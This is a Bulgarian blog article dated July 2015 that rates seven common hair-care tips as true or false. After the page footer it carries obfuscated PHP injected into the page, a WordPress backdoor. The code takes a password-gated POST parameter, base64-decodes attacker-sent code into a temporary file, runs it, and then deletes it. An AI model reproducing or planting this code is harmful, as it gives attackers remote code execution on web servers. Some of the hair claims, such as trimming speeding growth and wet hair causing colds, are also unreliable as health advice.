Как да се грижим за косата си: кое е истина и лъжа | Косопад

Как да се грижим за косата си: кое е истина и лъжа

За много жени красивата и поддържана коса е приоритет. Затова търсим постоянно съвети и нови трикове, които да ни помогнат в тази задача. Сред истините обаче, има и много лъжи. Нека разгледаме кое е вярно и кое – не от най- разпространените съвети за косата:

1. Вредно е да си мием косата всеки ден. Лъжа. Въпросът е в това дали използваме подходящите продукти или не. Не всеки тип коса трябва да се мие през една и съща честота.

2. Подстригването на косата я кара да расте по- бързо. Истина. Не трябва много да я скъсявате, но връхчетата подстригвайте редовно.

3. Когато си пием косата, капе. Лъжа. Косата, която пада по време на миене, е вече във фазата на растежа си, в която трябва да падне. Ако няма никакъв проблем, новата коса започва да расте веднага на нейно място.

kosa-obnovqvane

4. Вредно е да се спи с мокра коса. Истина. Може да настинете, да увредите кутикулаката на косъма, и пр. Избягвайте да го правите.

5. По- добре ли е да я разплитаме суха? Лъжа. Най- добре да се прави с влажна коса, тъй като е по- гъвкава. Не е необходимо да я решете всеки ден. Когато косъмът е сух, косата се къса по- лесно. Използвайте гребен или четка, които не я увреждат.

6. Рядкото миене на косата е по- полезно. Лъжа. Т.нар. мода no poo не е препоръчителна, според експертите. Шампоанът почиства скалпа, което помага на порите да се отворят, фоликулите дишат по- лесно.

7.  Студената вода прави косата блестяща. Истина. Не е необходимо постоянно да си миете косата със студена вода. Преди да нанесете шампоана, може да е топла, защото така се отварят порите. При последното миене вече може да използвате студена вода.

23. юли 2015 17:21:10 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}